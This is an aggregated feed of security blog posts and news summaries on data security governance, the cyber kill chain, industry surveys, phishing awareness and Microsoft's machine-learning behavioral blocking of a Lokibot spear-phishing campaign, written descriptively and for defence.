  • Is this data compliant with the regulations my business needs to adhere to?
  • Can the original owner of the data make a request to get it deleted?

A framework for better data security

By answering these questions, enterprises can create a Data Security Governance Framework (DSGF) to better utilize and protect data. The research recommends this approach over acquiring data protection products and trying to adapt to them to suit a business need. A Data Security Governance Framework (DSGF) provides a blueprint that is organization-centric which classifies data assets and provides the bedrock for data security policies.

In this framework, there is no one-size-fits-all solution. Every enterprise approaches data security on a case-by-case basis, trying to understand their unique data security requirements in the hopes of finding unique solutions.

The need for better alignment

The framework helps to provide a balance between the business need to maximize competitive advantage and the need to apply appropriate security policy rules. Adopting this framework will require greater collaboration within an enterprise’s Information Security Team regarding aligning approaches for data classification and lifecycle management. This involves classifying data according to unique requirements – which dataset is the most important and requires maximum security?

Different businesses use different methods for protecting data –

Data Masking

A method through which data at rest or in motion is masked which protects it but also ensures that it is usable. It helps organizations raise their level of security for sensitive data while conforming to privacy regulations and other compliances.

Data Audit and Protection

This method uses active data control, monitoring and logging to check and detect suspicious activities.

Unusual behaviour and anomalies are detected and flagged and acted upon instantly by stopping suspicious users from accessing critical data and flagging network administrators about this behaviour. Data is separated from users as per their roles.

DSGF can be a useful tool for enterprises to plan their data security investments and allocations. The framework helps an enterprise understand their own requirements clearly and helps enterprises to make better decisions on investment purposes. Some of the key details that DSGF can help in are in:

  • Volume, veracity and variety details of each type of dataset
  • Business risks and financial impacts of each dataset
  • Data residency issues affecting each dataset, specifically as there are different data privacy laws for different geographies and jurisdictions
  • Asset management data
  • Consistent access and usage policies for different datasets

Rather than using technology to solve their data security issues, enterprises must ideally use the Data Security Governance Framework (DSGF) to understand and identify their own business requirements. Once the identification is conducted and a framework is created, it would then be prudent to identify the appropriate technology solution for an enterprise’s own data needs.

However, if you want expert consultation on your current framework, please contact us and we will be glad to advise you.

The post Prioritizing Data Security Investments through a Data Security Governance Framework (DSGF) appeared first on Seqrite Blog.

5 things security executives need to know about insider threat

Insider threat is, unfortunately, an issue that has not yet received sufficient priority. According to the 2018 Deloitte-NASCIO Cybersecurity Study, CISOs’ top challenges remain “budget, talent and increasing cyber threats,” and to some, insider threat doesn’t even make the list of top-ten priorities. Considering what’s at stake – and our 21st-century ability to see signs of, and ultimately prevent, insider threat – this is a phenomenon security executives can no longer afford to ignore. Specifically, … More

The post 5 things security executives need to know about insider threat appeared first on Help Net Security.

New data analysis approach could strengthen the security of IoT devices

A multi-pronged data analysis approach that can strengthen the security of IoT devices, such as smart TVs, home video cameras and baby monitors, against current risks and threats has been created by a team of Penn State World Campus students. Explosion of IoT devices A new forecast from IDC estimates that there will be 41.6 billion connected IoT devices, or “things,” generating 79.4 zettabytes (ZB) of data in 2025. “These devices can leave people vulnerable … More

The post New data analysis approach could strengthen the security of IoT devices appeared first on Help Net Security.

Researchers may have found a way to trace serial IP hijackers

Hijacking IP addresses is an increasingly popular form of cyberattack. This is done for a range of reasons, from sending spam and malware to stealing Bitcoin. It’s estimated that in 2017 alone, routing incidents such as IP hijacks affected more than 10 percent of all the world’s routing domains. Left to right: senior research scientist David Clark, graduate student Cecilia Testart, and postdoc Philipp Richter. Photo by Jason Dorfman, MIT CSAIL. There have been major … More

The post Researchers may have found a way to trace serial IP hijackers appeared first on Help Net Security.

70% of presidential campaigns fail to provide adequate online privacy and security protections

An alarming 70% of the campaign websites reviewed in the OTA 2020 U.S. Presidential Campaign Audit failed to meet OTA’s privacy and security standards – potentially exposing visitors to unnecessary risks. Only seven (30%) of the analyzed campaigns made the Honor Roll, a designation recognizing campaigns that displayed a commitment to using best practices to safeguard visitor information. To qualify for the Honor Roll, campaigns must have an overall score of 80% or higher, with … More

The post 70% of presidential campaigns fail to provide adequate online privacy and security protections appeared first on Help Net Security.

Consumers concerned about connected home privacy, still few implement safety practices

In order to understand what people are doing to protect themselves from the risk of compromised smart home devices, such as internet-connected TVs, smart thermostats, home assistants and more, ESET polled 4,000 consumers. Key findings include: Over a third of all respondents indicated they are concerned about unauthorized access of their home networks via connected home devices (smart TVs, smart thermostats etc.). 35% of Americans and 37% of Canadians indicated so in our survey. When … More

The post Consumers concerned about connected home privacy, still few implement safety practices appeared first on Help Net Security.

Canadian SMBs incur a potential productivity loss of CA$2 billion using older technology 

A recent study commissioned by Microsoft and Intel reported that the cost of using a PC older than four years is more than buying a new one.  As per StatsCanada, the country is home to around 1.2 million small and medium businesses. These businesses comprise 98.8 per cent of the total employee businesses in the…

What is the kill chain and the seven steps involved in it?

Estimated reading time: 2 minutes

The term ‘kill chain’ originated in the military as a concept to outline and define each stage of an attack. It has found its way into cybersecurity as well as a means to understand the structure of a cyber attack and disrupt it. There are seven defined phases of the kill chain with each phase having a specific utility to the attacker.

For enterprises waging a relentless war against cyber attackers, it is essential to understand each stage of the kill chain to make guided interventions when required and block the attack. In 2013, Lockheed Martin, the global American military giant, used this model to stop a SecurID attack.

Here are the seven phases that comprise the kill chain:

Phase 1: Reconnaissance

This phase involves both, passive and active reconnaissance on the part of the attacker. Identification of a vulnerable target is the most important objective of this phase and in pursuit of the objective, attackers will try and gather as much data and knowledge they can on their targets. This is a preparation phase before the launching of a cyber attack.

Phase 2: Weaponization

Once the Reconnaissance phase is complete, the attacker will move on to the next phase which is Weaponization. In this phase, the attacker will decide on the best type of tool they have at their disposal to carry out their attack on the target. This decision will be based on the findings of the Reconnaissance phase. The attacker could use methods like a Distributed Denial of Service (DDoS) attack, a botnet attack or malware to attack unpatched systems.

Phase 3: Delivery

The Delivery phase involves the attacker to deliver the attack through a malicious payload. This payload can be delivered through a variety of means: a phishing email, a drive-by-download attack or spear phishing.

Phase 4: Exploitation

At the Exploitation phase, the attacker exploits the vulnerability that has been discovered to carry out their attack. The targeted system is typically compromised and the attack enters the system. At this stage, the attacker has already gained a foothold and may try to make further intrusions by installing other malware.

Phase 5: Installation

After the Exploitation phase, the Installation phase involves the malicious software being installed and multiplying inside the breached system. Users may unknowingly install and spread the malware on their systems by taking actions such as sending infected emails to other users. The breaches may multiply across the affected network.

Phase 6: Command & Control

At this stage, the attacker is in full control. After successfully gaining entry and breaching an enterprise’s defenses, the malware can be fully commanded and controlled by the attacker who can use it for any malicious purposes. This can include sending back confidential information, passwords, emails or anything else the attacker seeks.

Phase 7: Action on Objectives

This is the seventh and the final stage of a cyber attack. This phase is defined as the ‘Action on Objectives’ phase and refers to the final actions which an attacker takes on conducting a successful attack. An attack could have various goals – to extract a ransom through a ransomware attack, to sell data on the Dark Web or to leak confidential information to a rival enterprise.

It is important for enterprises to understand and remain prepared for each phase of a cyber attack. As outlined above, every phase is different and requires the corresponding action.

Seqrite’s solutions enable better protection at every stage and ensure enterprises stay secure against cyber attacks.

The post What is the kill chain and the seven steps involved in it? appeared first on Seqrite Blog.

DevSecOps role expansion has changed how companies address their security posture

While organizations shift their applications to microservices environments, the responsibility for securing these environments shifts as well, Radware reveals. The rapid expansion of the Development Security Operations (DevSecOps) role has changed how companies address their security posture with approximately 70% of survey respondents stating that the CISO was not the top influencer in deciding on security software policy, tools and or implementation. This shift has likely exposed companies to a broader range of security risks … More

The post DevSecOps role expansion has changed how companies address their security posture appeared first on Help Net Security.

11 steps organizations should take to improve their incident response strategy

As the year draws to a close, it is time for businesses across all industries and sectors to reflect and prepare for the upcoming new year. With this in mind, FIRST has produced 11 vital steps that organizations should take to improve their incident response strategy. It is highly likely that an organization will face a cybersecurity incident of some sort at some point in its lifetime, regardless of the level of cybersecurity defense in … More

The post 11 steps organizations should take to improve their incident response strategy appeared first on Help Net Security.

ICS cybersecurity investment should be a priority in protecting operations from disruption

93% of ICS security professionals are concerned about cyberattacks causing operational shutdown or customer-impacting downtime, according to a Tripwire survey. In an effort to prepare against such threats, 77% have made ICS cybersecurity investments over the past two years, but 50% still feel that current investments are not enough. The survey was conducted by Dimensional Research and its respondents included 263 ICS security professionals at energy, manufacturing, chemical, dam, nuclear, water, food, automotive and transportation … More

The post ICS cybersecurity investment should be a priority in protecting operations from disruption appeared first on Help Net Security.

Majority of Americans Fail Basic Cybersecurity Awareness

A newly released study from the Pew Research Center revealed most Americans are not aware of basic cybersecurity practices.

The study surveyed 4,272 American adults on a variety of technology-related issues and found that most of them struggled with basic cybersecurity concepts. Only 28 percent of respondents were familiar with two-factor authentication, and only 30 percent were aware that “https://” in a web address meant the connection was encrypted. Only 2 percent of those surveyed answered all ten questions correctly.

On privacy-related issues, the survey saw showed significant gaps in basic knowledge. Less than half of the subjects could correctly define privacy policies as “contracts between websites and users about how those sites will use their data,” and only 24 percent were aware that “private browsing” only hides online activities from other people using the same computer.

Adults with bachelor’s or advanced degrees tended to consistently score higher than those with high school educations or less. Respondents aged 18-29 also performed better than those above the age of 65, although the gap was smaller than that of the level of education achieved. 

The lack of awareness regarding https and two-factor authentication is perhaps most troubling since there have been widespread efforts to encourage the usage of https, and recent data released suggesting two-factor authentication protects users against 99.9% of cyberattacks.

The findings of the study paint a bleak picture for cybersecurity in U.S. workplaces, where employee or contractor ignorance and negligence have consistently been one of the largest causes of data breaches for the last several years. 

See the Pew Research report here

 

The post Majority of Americans Fail Basic Cybersecurity Awareness appeared first on Adam Levin.

Watch Your Step: Insights on the TOMS Shoes Mailing Hack

You’re familiar with the cybercriminals that go after users’ credit card information and look to spread malicious links, but recently, one hacker decided to send a different message. According to Vice’s Motherboard, a hacker accessed TOMS Shoes’ mailing list and sent an email encouraging users to log off and go enjoy the outdoors.

The email specifically stated, “hey you, don’t look at a digital screen all day, theres a world out there that you’re missing out on.” The hacker claimed to have compromised TOMS a while back but never had any malicious intent and felt it had been too long to disclose the breach to the authorities. Although the hacker didn’t tell Motherboard how he or she specifically gained access to the TOMS account, they did voice their frustrations with hackers who steal data from large companies and innocent civilians.

Representatives from TOMS stated that they are actively looking into the breach and warned users to not interact with the message. And while this particular hacker had no malicious intent, users could have a potential phishing scam on their hands if these email addresses had ended up in the wrong hands.

So, whether you’re a TOMS shoe wearer or not, it’s important to stay updated on potential cyberthreats so you can recognize immediately. Here are some tips to help you avoid accidentally treading on potential phishing emails:

  • Go directly to the source. Be skeptical of emails claiming to be from companies with peculiar asks or messages. Instead of clicking on a link within the email, it’s best to go straight to the company’s website to check the status of your account or contact customer service.
  • Be cautious of emails asking you to take action. If you receive an email asking you to take a certain action or download software, don’t click on anything within the message. Instead, go straight to the organization’s website. This will prevent you from downloading malicious content from phishing links.
  • Hover over links to see and verify the URL. If someone sends you an email with a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Watch Your Step: Insights on the TOMS Shoes Mailing Hack appeared first on McAfee Blogs.

Build or buy: What to consider when deploying on-premise or cloud-based PKI

Public Key Infrastructure (PKI), once considered an IT table stake, has transformed from a tool used to protect websites to a core digital identity management function within the cybersecurity framework. Today’s PKI establishes and manages digital identities across people, applications and devices within the enterprise. IT teams are deploying PKI to combat several growing cybersecurity threats too, from ransomware and phishing attacks to IoT device hijacking. PKI remains a core component within the larger IT … More

The post Build or buy: What to consider when deploying on-premise or cloud-based PKI appeared first on Help Net Security.

Cybercrime is maturing, shifting its focus to larger and more profitable targets

Cybercrime is continuing to mature and becoming more and more bold, shifting its focus to larger and more profitable targets as well as new technologies. Data is the key element in cybercrime, both from a crime and an investigate perspective. These key threats demonstrate the complexity of countering cybercrime and highlight that criminals only innovate their criminal behavior when existing modi operandi have become unsuccessful or more profitable opportunities emerge. In essence, new threats do … More

The post Cybercrime is maturing, shifting its focus to larger and more profitable targets appeared first on Help Net Security.

Only 32% of organizations employ a security-first approach to cloud data storage

Although nearly half (48%) of corporate data is stored in the cloud, only a third (32%) of organizations admit they employ a security-first approach to data storage in the cloud, according to a global study from Thales, with research from the Ponemon Institute. Surveying over 3,000 IT and IT security practitioners in Australia, Brazil, France, Germany, India Japan, the United Kingdom and the United States, the research found that only one in three (31%) organizations … More

The post Only 32% of organizations employ a security-first approach to cloud data storage appeared first on Help Net Security.

Does poor password hygiene still hamper your ability to achieve high security standards?

While more businesses are investing in security measures like multifactor authentication (MFA), employees still have poor password habits that weaken companies’ overall security posture, according to LastPass. Given that stolen and reused credentials are linked to 80 percent of hacking-related breaches, businesses must take more action to improve password and access security to make a big impact on risk reduction. “Securing employee access has never been more important and unfortunately, we see businesses ignore password … More

The post Does poor password hygiene still hamper your ability to achieve high security standards? appeared first on Help Net Security.

Impact and prevalence of cyberattacks that use stolen hashed administrator credentials

There’s a significant prevalence and impact of cyberattacks that use stolen hashed administrator credentials, also referred to as Pass the Hash (PtH) attacks, within businesses today, according to a survey from One Identity. Among the survey’s most noteworthy findings is that 95% of respondents say that PtH attacks have a direct business impact on their organizations. Conducted by Dimensional Research, the survey of more than 1,000 IT professionals reinforces the crucial need for organizations to … More

The post Impact and prevalence of cyberattacks that use stolen hashed administrator credentials appeared first on Help Net Security.

Winning the security fight: Tips for organizations and CISOs

For large organizations looking to build a robust cybersecurity strategy, failure to get the fundamentals in place practically guarantees a disaster. If you ask Matthew Rosenquist, a former Cybersecurity Strategist for Intel (now independent), overcoming denial of risk, employing the right cybersecurity leader, and defining clear goals are the three most critical objectives for avoiding a negative outcome. Getting things right “Every organization, large and small, begins with a belief they are not at significant … More

The post Winning the security fight: Tips for organizations and CISOs appeared first on Help Net Security.

Digital transformation requires an aggressive approach to security

Organizations agree, building security into digital transformation initiatives is a priority, yet the recommended path to progress is unclear, according to a survey conducted by ZeroNorth. Companies of all sizes and in all industries are experiencing the pains of digital transformation, with 79% of survey respondents indicating their organization already has related initiatives underway. All participants indicate the importance of digital transformation to the future of their organization, even those who have not yet embarked … More

The post Digital transformation requires an aggressive approach to security appeared first on Help Net Security.

FBI Warns of Cyber Attacks on Multi-Factor Authentication

The FBI is warning businesses about a new series of cyberattacks that can circumvent multi-factor authentication (MFA).

In a Private Industry Notification (PIN), the FBI warned businesses that “cyber actors” had been observed, “circumventing multi-factor authentication through common social engineering and technical attacks.” The report went on to describe several scenarios where hackers bypassed MFA protections, accessing target networks and stored data. The methods used were SIM swapping, phishing, and newer hacking tools such as Muraena and Necrobrowser.

Multi-factor authentication, where a user’s login and password is supplemented with a token, one-time access code, or other means of verification is widely regarded as an effective baseline for enterprise cybersecurity; a recent study by Microsoft stated that, when deployed properly, it can block 99.9% of attacks on businesses. 

While the FBI still recommends multi-factor authentication, calling it a “strong and effective security measure to protect online accounts,” the PIN suggests boosting their effectiveness via workplace training to identify social engineering scams such as email-based phishing links and phony websites, as well as implementing more sophisticated forms of authentication.

Read the PIN here.

The post FBI Warns of Cyber Attacks on Multi-Factor Authentication appeared first on Adam Levin.

In hot pursuit of elusive threats: AI-driven behavior-based blocking stops attacks in their tracks

Our experience in detecting and blocking threats on millions of endpoints tells us that attackers will stop at nothing to circumvent protections. Even one gap in security can be disastrous to an organization.

At Microsoft, we don’t stop finding new ways to fill in gaps in security. We go beyond strengthening existing defenses by introducing new and innovative layers of protection. While our industry-leading endpoint protection platform stops threats before they can even run, we continue improving protections for instances where sophisticated adversarial attacks manage to slip through.

Multiple layers of protection mean multiple hurdles that attackers need to overcome to perpetrate attacks. We continuously innovate threat and malware prevention engines on the client and in the cloud to add more protection layers that detect and block sophisticated and evasive threats before they can even run.

In recent months, we introduced two machine learning protection features within the behavioral blocking and containment capabilities in Microsoft Defender Advanced Threat Protection. In keeping with the defense in depth strategy, coupled with the “assume breach” mindset, these new protection engines specialize in detecting threats by analyzing behavior, and adding new layers of protection after an attack has successfully started running on a machine:

  • Behavior-based machine learning identifies suspicious process behavior sequences and advanced attack techniques observed on the client, which are used as triggers to analyze the process tree behavior using real-time machine learning models in the cloud
  • AMSI-paired machine learning uses pairs of client-side and cloud-side models that integrate with Antimalware Scan Interface (AMSI) to perform advanced analysis of scripting behavior pre- and post-execution to catch advanced threats like fileless and in-memory attacks

The figure below illustrates how the two behavior-based machine learning protections enrich post-breach detections:

Figure 1. Pre and post-execution detection engines in Microsoft Defender ATP’s antivirus capabilities

The pre-execution and post-execution detection engines make up two important components of comprehensive threat and malware prevention. They reflect the defense in depth principle, which entails multiple layers of protection for thorough, wide-range defense.

In detecting post-execution behavior, using machine learning is critical. Many attack techniques are also used by legitimate applications. For example, a very common, documented method used by both clean applications and malware is creating a service for persistence.

To distinguish between malicious and clean applications when an attack technique is observed, Windows Defender Antivirus monitors and sends suspicious behaviors and process trees to the cloud protection service for real-time classification by machine learning. Cloud-based post-execution detection engines isolate known good behaviors from malicious intent to stop attacks in real time.

Within milliseconds of an attack technique or suspicious script execution being observed, machine learning classifiers return a verdict and the client blocks the threat. The pre-execution models then learn from these malicious blocks afterwards to protect Microsoft Defender ATP customers before attacks can begin executing new cycles of infection.

How behavioral blocking and containment protected 100 organizations from credential theft

In early July, attackers launched a highly targeted credential theft attack against 100 organizations around the world, primarily in the United Arab Emirates, Germany, and Portugal. The goal of the attack was to install the notorious info-stealing backdoor Lokibot and to exfiltrate sensitive data.

Behavioral blocking and containment capabilities in Microsoft Defender ATP detected and foiled the attack in its early stages, protecting customers from damage.

Spear-phishing emails carrying lure documents were sent to the target organizations; in one instance, three distinct highly targeted emails with the same lure document were delivered to a single pharmaceutical ingredient supplier. The attacker used pharmaceutical industry jargon to improve the credibility of the email and in one case requested a quote on an ingredient that the target company was likely to produce.

Figure 2. Multiple spear-phishing emails attempted to deliver the same lure document to the same target

The lure document itself didn’t host any exploit code but used an external relationship to a document hosted on a compromised WordPress website. If recipients opened the attachment, the related remote document, which contained the exploit, was also automatically loaded. This allowed the remote document to take advantage of the previously fixed CVE-2017-11882 vulnerability in Equation Editor and execute code on the computer.

Figure 3. The lure document contains an external reference to the exploit document is hosted on a compromised WordPress website.

Upon successful exploitation, the attack downloaded and loaded the Lokibot malware, which stole credentials, exfiltrated stolen data, and waited for further instructions from a command-and-control (C&C) server.

The behavior-based machine learning models built into Microsoft Defender ATP caught attacker techniques at two points in the attack chain. The first detection layer spotted the exploit behavior. Machine learning classifiers in the cloud correctly identified the threat and immediately instructed the client to block the attack. In cases where the attack had proceeded past this layer of defense to the next stage of the attack, process hollowing would have been attempted. This, too, was detected by behavior-based machine learning models, which instructed the clients to block the attack, marking the second detection layer. As the attacks are blocked, the malicious processes and corresponding files are remediated, protecting targets from credential theft and further backdoor activities.

Figure 4. Credential theft attack chain showing multiple behavior-based protection layers that disrupted the attack

The behavior-based blocking raised an “Initial Access” alert in Microsoft Defender Security Center, the console for SecOps teams that gives complete visibility into their environments and across the suite of Microsoft Defender ATP tools that protect their endpoints:

Figure 5. Alert and process tree on Microsoft Defender Security Center for this targeted attack

This attack demonstrates how behavior-based machine learning models in the cloud add new layers of protection against attacks even after they have started running.

In the next sections, we will describe in detail the two machine learning protection features in behavioral blocking and containment capabilities in Microsoft Defender ATP.

Behavior-based machine learning protection

The behavior engine in the Windows Defender Antivirus client monitors more than 500 attack techniques as triggers for analyzing new and unknown threats. Each time one of the monitored attack techniques is observed, the process tree and behavior sequences are constructed and sent to the cloud, where behavior-based machine learning models classify possible threats. Figure 4 below illustrates a more detailed view of our process tree classification path:

Figure 6. Process tree classification path

Behavior-based detections are named according to the MITRE ATT&CK matrix to help identify the attack stage where the malicious behavior was observed:

 

Tactic Detection threat name
Initial Access Behavior:Win32/InitialAccess.*!ml
Execution Behavior:Win32/Execution.*!ml
Persistence Behavior:Win32/Persistence.*!ml
Privilege Escalation Behavior:Win32/PrivilegeEscalation.*!ml
Defense Evasion Behavior:Win32/DefenseEvasion.*!ml
Credential Access Behavior:Win32/CredentialAccess.*!ml
Discovery Behavior:Win32/Discovery.*!ml
Lateral Movement Behavior:Win32/LateralMovement.*!ml
Collection Behavior:Win32/Collection.*!ml
Command and Control Behavior:Win32/CommandAndControl.*!ml
Exfiltration Behavior:Win32/Exfiltration.*!ml
Impact Behavior:Win32/Impact.*!ml
Uncategorized Behavior:Win32/Generic.*!ml

Since deployment, the behavior-based machine learning models have blocked attacker techniques like the following used by attacks in the wild:

  • Credential dumping from LSASS
  • Cross-process injection
  • Process hollowing
  • UAC bypass
  • Tampering with antivirus (such as disabling it or adding the malware as exclusion)
  • Contacting C&C to download payloads
  • Coin mining
  • Boot record modification
  • Pass-the-hash attacks
  • Installation of root certificate
  • Exploitation attempt for various vulnerabilities

These blocked behaviors show up as alerts in Microsoft Defender Security Center.

Figure 7. Alert for malicious behavior in Microsoft Defender Security Center

Machine learning protection for scripting engines with AMSI

Through the AMSI integration with scripting engines on Windows 10 and Office 365, Windows Defender Antivirus gains rich insight into the execution of PowerShell, VBScript, JavaScript and Office Macro VBA scripts to cut through obfuscation, protect against fileless attacks, and provide robust defenses against malicious script behavior.

To assist with fileless and evasive script attacks, scripting engines are instrumented to provide both behavior calls and dynamic content calls to the antivirus product. The type of integrations available varies based on the scripting engine. Table 1 below illustrates the current support with the Windows 10 and Office 365, and Figure 5 illustrates an example of the scripting engine dynamic script content and behavior calls for malicious scripts.

 

Microsoft AMSI integration point Dynamic script content calls Behavior calls
PowerShell Y
VBScript Y Y
JavaScript Y Y
Office VBA macros Y
WMI Y
MSIL .NET Y

Figure 8. Example dynamic script content and behavior calls for malicious scripts monitored by AMSI

Our scripting machine learning protection design can be seen in Figure 6 below. We deployed paired machine learning models for various scripting scenarios. Each pair of classifiers is made up of (1) a performance-optimized lightweight classifier that runs on the Windows Defender Antivirus client, and (2) a heavy classifier in the cloud. The role of the client-based classifier is to inspect the script content or behavior log to predict whether a script is suspicious. For scripts that are classified as suspicious, metadata describing the behavior or content is featurized and sent up to the cloud for real-time classification; the metadata that describes the content includes expert features, features selected by machine learning, and fuzzy hashes.

Figure 9. AMSI-paired models classification path

The paired machine learning model in the cloud then analyzes the metadata to decide whether the script should be blocked or not. If machine learning decides to block the file, the running script is aborted. This paired model architecture is used to offload the overhead of running intensive machine learning models to the cloud, and to make use of the global information available about the content through the Microsoft Intelligent Security Graph.

Malicious scripts blocked by AMSI-paired machine models are reported in Microsoft Defender Security Center using threat names like the following:

  • Trojan:JS/Mountsi.A!ml
  • Trojan:Script/Mountsi.A!ml
  • Trojan:O97M/Mountsi.A!ml
  • Trojan:VBS/Mountsi.A!ml
  • Trojan:PowerShell/Mountsi.A!ml

Behavioral blocking and containment for disrupting advanced attacks

The two new cloud-based post-execution detection engines we described in this blog are part of the behavioral blocking and containment capabilities that enabled Microsoft Defender ATP to protect the 100 organizations targeted in the credential theft attack we discussed earlier. Recently, we also documented how behavior-based protections are important components of the dynamic protection against the multi-stage, fileless Nodersok campaign.

These engines add to the many layers of machine learning-driven protections in the cloud and add protection against threats after they have begun running. To further illustrate how these behavior-based protections work, here’s a diagram that shows the multiple protection layers against an Emotet attack chain:

Figure 10. Multiple layers of behavior-based protection in Windows Defender Antivirus while executing an Emotet attack (SHA-256: ee2bbe2398be8a1732c0afc318b797f192ce898982bff1b109005615588facb0)

As part of our defense in depth strategy, these new layers of antivirus protection not only expand detection and blocking capabilities; they also provide even richer visibility into malicious behavior sequences, giving security operations more signals to use in investigating and responding to attacks through Microsoft Defender ATP capabilities like endpoint detection and response, threat and vulnerability management, and automated investigation and remediation.

Within milliseconds of an attack technique or suspicious script execution being observed, machine learning classifiers return a verdict and the client blocks the threat. Our pre-execution models then learn from these malicious blocks afterwards to protect Microsoft Defender ATP customers before the threats even begin executing.

Figure 11. Multiple layers of malware and threat prevention engines on the client and in the cloud

The impact of the continuous improvements in antivirus capabilities further show up in Microsoft Threat Protection, Microsoft’s comprehensive security solution for identities, endpoints, email and data, apps, and infrastructure. Through signal-sharing across Microsoft services, the richer machine learning-driven protection in Microsoft Defender ATP is amplified throughout protections for various attack surfaces.

 

Geoff McDonald
with Saad Khan
Microsoft Defender ATP Research

The post In hot pursuit of elusive threats: AI-driven behavior-based blocking stops attacks in their tracks appeared first on Microsoft Security.

Unmask cybercriminals through identity attribution

Organized crime has grown more complex since the turn of the century—coinciding with the rise of the digital world, cybercriminals have leveraged the proliferation of technology to broaden their reach with a more sophisticated network-structured model, effectively globalizing their operations in cyberspace and ultimately allowing cybercriminals to devastate companies and consumers alike. The faster you act, the quicker you will be able to disrupt the adversary and prevent future attacks, directly yielding greater financial savings … More

The post Unmask cybercriminals through identity attribution appeared first on Help Net Security.

Product showcase: Awake Security Network Traffic Analysis Platform

Security experts profess that enterprise organizations must assume their network is already compromised. Cyber-attacks use network communications for malware distribution, command and control, and data exfiltration. With the right tools, security professionals should be able to uncover malicious activity and take prompt action to mitigate it. Network traffic analysis (NTA) tools were designed to help security personnel to detect attackers that had managed to evade traditional defenses, especially those that are already inside the perimeter. … More

The post Product showcase: Awake Security Network Traffic Analysis Platform appeared first on Help Net Security.

Organizations need tools that support DevOps security

Organizational silos create unnecessary security risk for global businesses. The lack of security involvement in DevOps projects was reportedly creating cyber risk for 72% of IT leaders, according to Trend Micro. In an effort to better understand the DevOps culture, Trend Micro commissioned Vanson Bourne to poll 1,310 IT decision makers in SMB and enterprise organizations across the globe about their organizational culture. “It’s no secret that developers and security teams have a history of … More

The post Organizations need tools that support DevOps security appeared first on Help Net Security.

Internal user mistakes create large percentage of cybersecurity incidents

Internal user mistakes created the largest percentage of cybersecurity incidents over the past twelve months (80%), followed by exposures caused by poor network system or application security (36%), and external threat actors infiltrating the organization’s network or systems (31%), SolarWinds research reveals. Poor password management ranked as the leading cause of concern for German IT professionals regarding insider threats. Forty-five percent of tech pros surveyed indicated poor password management or weak passwords as the most … More

The post Internal user mistakes create large percentage of cybersecurity incidents appeared first on Help Net Security.

Bringing Cybersecurity Home

October is Cybersecurity Awareness Month, reminding us that cyber-attacks know no boundaries between work and home, so we need to be diligent about cyber hygiene across all environments. With the abundance of connected devices we all depend on, protecting your digital footprint is no longer optional. But where do you learn what to do?

People who work for larger corporations may receive cyber information and training from their employer. For instance, at Cisco every employee gets basic cyber training and increasingly advanced training based on your role; we even share educational materials on applying best practices at home. But not all businesses have the resources to dedicate to such training. And in the home, most people have limited cyber knowledge at best, and only pay attention if or when they become victims of an attack.

To get you started, here are a few tips that will help you to “own IT, protect IT and secure IT” to stay safe online.

Recognize we are experiencing radical change. With our busy lives, we take technology for granted. But it’s important to realize that technology is changing society faster than any other advance in human history. Adults need to get smart about the implications and actively discuss “today’s digital reality” with their children. Just as you teach a toddler to avoid a hot stove, teach them from an early age about safe online practices.

Ask questions. When you acquire a new connected device, stop and ask where it came from.  Who connects with it and/or captures data from it? For what purpose do they collect the data and is that important to me? How do they care for the protection of your data and privacy?  The more knowledgeable you become, the smarter your next questions will be.

Maintain your devices. Understand if the device you’re buying has software that will need updated and patched as vulnerabilities are found and fixed. If so, make sure that gets done. Just like not replacing expired batteries in a smoke alarm, using outdated unsecure software won’t keep you safe.

Secure and Protect Passwords. Make your passwords long and complex; change them regularly; don’t use the same password for multiple applications Change default password settings on new devices. We all know multiple passwords can get cumbersome and hard to remember, so use a reputable password manager to keep track for you.  Many businesses and institutions provide Two-factor authentication (2FA) as an added step to protect your on-line identity and data.  If it’s offered, use it.

Embrace technology, but be aware.  If you were walking down a dark street in an unfamiliar city, you’d likely be more aware about who else is around you or may be following you. Treat the internet the same way. Being connected does not mean bad things will happen, but it pays to stay alert and understand best practices and how to apply them. For instance, don’t open email attachments if you’re not completely sure of the sender’s trustworthiness. Don’t click on emailed links that you haven’t asked for. “Stop, think before you click” to avoid the burden of what may come after a malicious attack.

Remember Data Privacy. While security and privacy are different, they’re definitely related. When you’re watching for online threats, also remember that nothing online is really ‘free’ – you’re most likely giving up something (data) to get a “free service/app”.  Ask – is the intrinsic value of the “free” thing worth it? When you download an app or sign up for a new service that collects your data, choose carefully what sharing you allow. And remember, when you put personal information online, it stays around for a long time and may come back to you in unexpected, and unwelcome, ways.

It’s time to bring cybersecurity into the greater social consciousness and constructive discussions about changing norms. As new capabilities keep coming to market faster, we should and can have the right social adaptation to embrace technology safely.

 


Additional Resources

Tips to help improve your cyber-hygiene (Infographic)

Trust.cisco.com

 

2020: A new paradigm in Cybersecurity

Estimated reading time: 3 minutes

As we enter a new decade, it is important to look back and learn from the decade that is about to end. From 2010 to 2019, cybersecurity moved at a furious pace. Threats erupted in multiple new vectors, spreading far and wide and shutting down thousands of organizations at the blink of an eye.

State-sponsored cybersecurity threats became an imminent danger with governments waking up to the sheer horror of the scale of damage it caused. Social media giants were increasingly viewed with suspicion by regulators about how they use the data of their users.

The terms ‘Dark Web’ and ‘Deep Web’ have become common among not just cybersecurity specialists, but also regular users.

A new era of cybersecurity

Looking at that pace of change, one thing is quite certain – 2020 and the start of the next decade will bring about a new paradigm in cybersecurity.

This paradigm shift is likely to be driven by the fear of the damages cybersecurity attacks can cause. One figure estimates the cost of cyber attacks to the world to rise to $6 trillion by 2020. A key figure in that calculation is the unprecedented rise of connected devices.

As the world moves to an Internet of Things (IoT) era, an increasing number of devices will be connected to the Internet, enabling a more customized user experience. That, however, also increases the number of devices at risk of cyberattacks. Gartner estimates the number of Internet-connected devices to be 20 billion by 2020.

The role of the state will increase

Expect the role of the state in regulating cybersecurity to increase mainly because cyberattacks are starting to affect nation-states on a larger scale. The biggest countries in the world have instituted cybersecurity departments, recognizing the need to defend themselves against cyber warfare. Experts speculate that cyber threats could pose all sorts of problems for countries, with physical repercussions as well – imagine a cyber attack on a national power grid by an enemy state, wiping out the power system of thousands of homes and causing an emergency.

Recognizing the risks, governments will try and bring in more regulations for domains that have traditionally operated much freely till now. It will be a challenge for enterprises to stay abreast of regulations and maintain compliance.

Data privacy and the questions around it

